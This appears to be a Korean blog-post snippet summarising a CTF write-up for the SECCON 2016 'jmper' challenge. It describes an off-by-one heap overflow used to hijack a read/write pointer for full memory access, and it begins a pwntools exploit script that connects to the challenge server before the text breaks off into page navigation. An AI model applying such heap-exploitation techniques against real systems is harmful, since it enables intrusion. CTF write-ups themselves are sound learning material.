SECCON 2016 jumper 요약: 1바이트 힙오버. 힙객체속에 R/W 용 포인터의 하위 1바이트를 덮을수있어서, 그거로 추가적으로 포인터 더 덮고 조작하면 결국 모든메모리 읽고쓰기가능.summary: off-by-one heap overflow in memo. can hijack R/W pointer. full memory read/write is possible. from pwn import *context.arch = 'amd64'# i386 / arm # recvuntil sendline, pack, recv, sendr = remote('jmper.pwn.seccon.jp', 5656)#r = process(['./jmper_patch'])raw_input('attach')# start pwn. #[id 8][name 0x.. 더보기 이전 1 ··· 4 5 6 7 8 9 10 ··· 423 다음